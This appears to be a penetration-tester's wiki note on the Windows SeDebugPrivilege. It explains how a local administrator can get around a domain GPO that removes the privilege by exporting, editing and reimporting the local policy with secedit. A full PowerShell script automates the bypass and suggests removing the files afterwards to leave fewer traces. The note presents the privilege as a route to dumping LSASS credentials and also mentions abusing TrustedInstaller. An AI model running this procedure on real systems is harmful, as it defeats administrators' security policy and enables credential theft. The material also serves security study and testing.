27.08.2023 · dadevel

A Windows privilege (SeDebugPrivilege, "Debug programs") that allows a process to open any other process regardless of its DACL and read its memory, and therefore to escalate privileges, e.g. by dumping LSASS.

Untested tools:

GPO Bypass

The debug privilege can be removed from local administrators domain-wide via a GPO (User Rights Assignment, "Debug programs"), but a local admin can bypass this restriction, because the policy is only written into the local security database that the admin can edit.

Run whoami /priv from an elevated prompt as local admin and notice that SeDebugPrivilege is missing from the token.

Export the current security policy to a file.

secedit.exe /export /cfg secpolicy.inf /areas USER_RIGHTS

Edit the [Privilege Rights] section of secpolicy.inf so that it contains the following line (keep the [Unicode] and [Version] sections of the exported file, secedit refuses templates without them):

[Privilege Rights]
SeDebugPrivilege = *S-1-5-32-544

*S-1-5-32-544 is the well-known SID of the local Administrators group, so this allows local administrators to use the debug privilege again.

Import the modified policy. The /overwrite switch asks for confirmation; echo J answers it on a German system, use echo Y on an English one.

echo J | secedit.exe /configure /db secedit.sdb /cfg secpolicy.inf /overwrite /areas USER_RIGHTS

Privileges are part of the logon token, so the change only shows up in tokens created afterwards: log out and log in again (or start a new logon session with runas). The change stays in effect until the GPO is reapplied, i.e. until the next background refresh or a manual gpupdate.
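The whole procedure above as one script, added here as an example and not part of the original note: it records whether the current token has the privilege, exports the user-rights area, patches (or adds) the SeDebugPrivilege line while keeping the rest of the template intact, and imports it again. The working directory, file names and the locale check for the confirmation prompt are this example's own choices.

```powershell
# Added example: re-grant SeDebugPrivilege to BUILTIN\Administrators via secedit.
# Run from an elevated PowerShell prompt. Paths and the prompt handling are assumptions.
$ErrorActionPreference = 'Stop'
$Work      = Join-Path $env:TEMP 'sedebug'
$Template  = Join-Path $Work 'secpolicy.inf'
$Database  = Join-Path $Work 'secedit.sdb'
$AdminsSid = 'S-1-5-32-544'   # well-known SID of the local Administrators group
New-Item -ItemType Directory -Path $Work -Force | Out-Null

function Test-DebugPrivilege {
    # whoami /priv lists the privileges of the current token; a token created under
    # the restrictive GPO does not contain SeDebugPrivilege at all, not even as Disabled.
    return [bool](whoami /priv | Select-String -Pattern '^SeDebugPrivilege\b')
}

Write-Host "SeDebugPrivilege in current token: $(Test-DebugPrivilege)"

# 1. export only the user-rights area of the effective local policy
secedit.exe /export /cfg $Template /areas USER_RIGHTS | Out-Null

# 2. patch the SeDebugPrivilege line; the exported [Unicode] and [Version] sections
#    are kept untouched because secedit needs them to accept the template on import
$lines   = Get-Content -Path $Template
$patched = $false
$lines = foreach ($line in $lines) {
    if ($line -match '^SeDebugPrivilege\s*=') {
        $patched = $true
        "SeDebugPrivilege = *$AdminsSid"
    } else {
        $line
    }
}
if (-not $patched) {
    # no line at all means the right is assigned to nobody; add it to the section
    $lines = $lines -replace '^\[Privilege Rights\]$', "[Privilege Rights]`nSeDebugPrivilege = *$AdminsSid"
}
Set-Content -Path $Template -Value $lines -Encoding Unicode

# 3. import; /overwrite asks for confirmation and the expected answer depends on the
#    UI language (J on German, Y on English systems)
$answer = if ((Get-UICulture).TwoLetterISOLanguageName -eq 'de') { 'J' } else { 'Y' }
$answer | secedit.exe /configure /db $Database /cfg $Template /overwrite /areas USER_RIGHTS

# 4. the right only lands in tokens created after the change, so a new logon is needed
Write-Host 'Log off and log on again (or start a new logon session with runas), then check:'
Write-Host '  whoami /priv | findstr SeDebugPrivilege'
```

Get-Content honours the UTF-16 BOM of the exported template and Set-Content -Encoding Unicode writes it back in the same encoding, so the [Unicode] header of the file stays truthful. Remove the two files in $Work afterwards if you care about leaving traces on disk.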

Alternatively you can abuse TrustedInstaller. Its token always contains the debug privilege, regardless of the user rights assignment, so a process started under that token (or a thread impersonating it) can use it without touching the local policy.